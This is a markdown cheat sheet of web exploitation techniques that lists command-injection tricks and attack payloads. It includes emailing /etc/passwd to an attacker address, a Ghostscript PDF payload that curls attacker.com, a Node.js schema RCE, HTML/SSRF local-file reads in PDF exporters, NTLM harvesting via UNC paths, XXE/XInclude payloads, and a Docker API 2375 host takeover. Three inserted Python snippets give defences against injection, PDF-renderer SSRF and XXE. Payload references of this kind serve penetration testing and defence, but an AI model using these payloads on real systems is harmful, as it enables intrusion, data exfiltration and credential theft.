# Web Exploitation Methods

## Enumeration

### HTTP probe using cURL

```bash
cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
```

### PHP disabled function check

```php
<?php var_dump(explode(',', ini_get('disable_functions'))); ?>
```

## Exploitation

### Linux Command Injection

#### No Spaces Command Injection

```bash
# exec command, no spaces
$ {cat,/etc/passwd}

# write file, no spaces
{script,-c,"Y2F0IC9ldGMvcGFzc3dk",/dev/shm/run.b64}

# source: https://www.betterhacker.com/2016/10/command-injection-without-spaces.html
CMD=$'\x20/etc/passwd'&&cat$CMD
```

#### File Write No Redirectors

```bash
# setup payload
attacker$ echo -n whoami | base64 -w 0

# write base64
victim$ shuf -e <base64> -o /dev/shm/run.b64

# write decoded command
victim$ openssl base64 -d -in /dev/shm/run.b64 -out /dev/shm/run.sh
```
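Both of the sections above depend on a shell parsing the injected string: brace expansion, ANSI-C `$'\x20'` quoting and `&&` only mean something to a shell. The mitigation, shown here as an added example that is not part of the original cheat sheet, has two layers: validate the untrusted value against a tight allowlist, and start the helper program with an argv list instead of a shell command line, so that even a value that slipped through arrives as inert bytes. The account-name use case, the regex, the `getent` argv and the `printf` demonstration are assumptions chosen for illustration.

```python
import re
import subprocess

# Assumed use case: the handler accepts one untrusted value, an account name,
# and looks it up. The allowlist is deliberately tight (lowercase POSIX-style
# names), so braces, quotes, '$', '&' and whitespace never reach a process.
ACCOUNT_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")

# Constructed inputs modelled on the no-space payload shapes above, plus a
# benign name. None of these strings is ever handed to a shell in this file.
PAYLOADS = [
    "{cat,/etc/passwd}",
    "CMD=$'\\x20/etc/passwd'&&cat$CMD",
    "bob",
]


def build_argv(account: str) -> list[str]:
    """Return the argv for the lookup, or raise if the value is not allowlisted.

    The caller passes this list to subprocess.run without shell=True, so no
    shell ever parses it. '--' ends option parsing in case a looser allowlist
    ever admits a value starting with '-'.
    """
    if not ACCOUNT_RE.fullmatch(account):
        raise ValueError(f"rejected account name: {account!r}")
    return ["getent", "passwd", "--", account]


def classify(values: list[str]) -> dict[str, bool]:
    """Map each candidate value to whether build_argv would accept it."""
    result = {}
    for value in values:
        try:
            build_argv(value)
            result[value] = True
        except ValueError:
            result[value] = False
    return result


def echo_literally(value: str) -> str:
    """Show that without a shell, metacharacters pass through verbatim.

    printf(1) receives the value as its own argv element; nothing expands the
    braces or $'..' because no shell takes part in starting the process.
    """
    completed = subprocess.run(
        ["printf", "%s", value], capture_output=True, text=True, check=True
    )
    return completed.stdout


if __name__ == "__main__":
    for value, accepted in classify(PAYLOADS).items():
        print(f"{'ACCEPT' if accepted else 'REJECT'} {value!r}")
    print(repr(echo_literally(PAYLOADS[0])))
```

The order matters: validation rejects the two payloads outright, and the argv form is what protects the cases validation cannot anticipate. `shell=True` (or `os.system`, `popen` with a string) reintroduces the shell and with it every trick in the section above.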

### Exfil via Email

```bash
echo "message body: $(cat /etc/passwd)" | mail -s "loot" attacker@example.com
cat /etc/passwd | sendmail attacker@example.com
```

### PDF RCE

https://www.openwall.com/lists/oss-security/2018/08/21/2

```http
Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit
```

### Node.JS JSON Validation Command Injection (RCE)

```js
// https://hackerone.com/reports/894308
const schema = {
  type: 'object',
  properties: {
    'x[console.log(process.mainModule.require(`child_process`).execSync(`cat /etc/passwd`).toString(`utf-8`))]': {
      required: true,
      type: 'string'
    }
  },
}
```

### PDF Export Injection / HTML Injection / Server Side Request Forgery (SSRF) Local File Read

#### Using HTML

Via securityonline.info

iframe

```html
<iframe src="file:///C:/windows/system32/drivers/etc/hosts" height=1000 width=1000/>
```

object

```html
<object data="http://127.0.0.1:8443"/>
```

link

```html
<!-- local file read -->
<link rel=attachment src="file:///etc/passwd">
```

```bash
# to extract
pdfdetach -saveall vuln.doc
```

#### Using Javascript

```html
<script>x=new XMLHttpRequest;
x.onload=function(){ document.write(this.responseText) };
x.open("GET","file:///etc/passwd"); x.send(); </script>
```

Via noob.ninja

object

```html
<html>
  <body>
    <object data="file:///etc/passwd"/>
  </body>
</html>
```

portal

```html
<html>
  <body>
    <portal src="file:///etc/passwd" id=portal></portal>
  </body>
</html>
```
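Every payload in this section makes the HTML-to-PDF renderer fetch a URL the author chose, either a local file or a loopback service. As an added example, not taken from the cheat sheet or from the cited write-ups, the audit below inspects HTML before it reaches the renderer: resource-loading tags are refused, and any URL must be relative or point at an allowlisted asset host. The allowlisted host `assets.example.com` and the sample fragments are constructed for the demonstration (quotes in the samples are normalised so they parse).

```python
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlsplit

# Tags that make the renderer fetch or embed a resource, or run script.
BLOCKED_TAGS = {"iframe", "frame", "object", "embed", "link", "portal",
                "script", "base", "meta"}
# Attributes through which a URL reaches the renderer.
URL_ATTRS = {"src", "href", "data", "action", "formaction", "poster"}
# Assumed: the only host the renderer is ever allowed to fetch from.
ALLOWED_HOSTS = {"assets.example.com"}


def url_finding(value: str) -> Optional[str]:
    """Return why a URL is unacceptable for the renderer, or None if it is fine."""
    parts = urlsplit(value.strip())
    scheme = parts.scheme.lower()
    if scheme and scheme not in {"http", "https"}:
        return f"scheme-{scheme}"      # file:, data:, javascript:, ...
    host = (parts.hostname or "").lower()
    if host == "":
        return None                    # relative URL, served by the app itself
    if host not in ALLOWED_HOSTS:
        # An allowlist avoids enumerating loopback/private ranges and the many
        # alternative spellings of an address that denylists tend to miss.
        return "host-not-allowlisted"
    return None


class PdfInputAuditor(HTMLParser):
    """Collects policy violations in HTML destined for the PDF renderer."""

    def __init__(self) -> None:
        super().__init__()
        self.violations: list[str] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag in BLOCKED_TAGS:
            self.violations.append(f"blocked-tag:{tag}")
        for name, value in attrs:
            if name in URL_ATTRS and value is not None:
                reason = url_finding(value)
                if reason:
                    self.violations.append(f"{reason}:{tag}@{name}")


def audit_pdf_html(fragment: str) -> list[str]:
    """Return the list of violations; an empty list means the fragment passed."""
    auditor = PdfInputAuditor()
    auditor.feed(fragment)
    auditor.close()
    return auditor.violations


# Constructed samples modelled on the payloads above, plus a benign fragment.
SAMPLES = {
    "iframe": '<iframe src="file:///C:/windows/system32/drivers/etc/hosts" height=1000 width=1000></iframe>',
    "object": '<object data="http://127.0.0.1:8443"></object>',
    "link": '<link rel=attachment src="file:///etc/passwd">',
    "script": '<script>x=new XMLHttpRequest; x.open("GET","file:///etc/passwd"); x.send();</script>',
    "portal": '<portal src="file:///etc/passwd" id=portal></portal>',
    "benign": '<p>Invoice 42</p><img src="https://assets.example.com/logo.png"><a href="/terms">Terms</a>',
}

if __name__ == "__main__":
    for label, fragment in SAMPLES.items():
        print(f"{label:7} {audit_pdf_html(fragment) or 'ok'}")
```

Input filtering is one layer; the renderer itself should also run with `file:` access disabled and without a route to internal services, so that a fragment the audit misses still cannot read anything useful.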

### Harvesting Credentials

UNC + WebDAV can be used to harvest NTLM on arbitrary ports allowed through the firewall.

```
# WebDAV HTTP UNC path
\\workstation1@8080\mdsec.png
```

### XXE

```xml
<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>
```

#### Using xinclude

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
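The two XXE shapes above, the parameter entity smuggled inside CDATA and the XInclude element, are both caught by a simple pre-parse policy: reject any DTD or entity declaration, and reject any element in the XInclude namespace. The check below is an added example, not code from the cheat sheet, written against Python's standard-library `xml.etree`; the SOAP namespace declaration in the sample is added so the fragment parses on its own, and the samples themselves are constructed from the payloads above. The CDATA case matters because the outer parser sees only text: the DTD only becomes live if the application feeds that text to a second parser, so the audit flags it at the element that carries it.

```python
import re
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"
# Any DTD or entity declaration is rejected outright; a legitimate request to
# this (assumed) endpoint never needs one.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed samples modelled on the two payloads above.
SOAP_CDATA_XXE = """<soap:Body xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>"""

XINCLUDE_DOC = """<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>"""

BENIGN = "<foo><bar>hello</bar></foo>"


def xml_findings(document: str) -> list[str]:
    """Return the reasons this document should be rejected (empty if none)."""
    findings = []
    # Cheapest check first, on the raw bytes, before any parser is involved.
    if DTD_RE.search(document):
        findings.append("dtd-in-document")
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        return findings + [f"parse-error:{exc}"]
    for element in root.iter():
        # Namespaced tags come back as '{namespace}localname'.
        if element.tag.startswith("{" + XINCLUDE_NS + "}"):
            findings.append(f"xinclude:{element.get('href')}")
        # CDATA arrives as ordinary text. If this text is ever re-parsed
        # downstream, the declaration hidden in it becomes live.
        if element.text and DTD_RE.search(element.text):
            findings.append(f"dtd-in-text:{element.tag}")
    return findings


if __name__ == "__main__":
    for label, doc in [("soap", SOAP_CDATA_XXE), ("xinclude", XINCLUDE_DOC), ("benign", BENIGN)]:
        print(f"{label:8} {xml_findings(doc) or 'ok'}")
```

The pre-parse rejection is deliberately independent of parser configuration: whichever library handles the document afterwards, external entity loading and XInclude processing should still be switched off in that library, since a policy check on the way in is no substitute for a parser that cannot fetch `http://0x0:22/` or `file:///etc/passwd` in the first place.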

## Misc

### Docker API (2375/tcp) Easy RCE by PTSwarm

```bash
# exploit
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

# file access
cat /mnt/etc/shadow

# RCE
chroot /mnt
```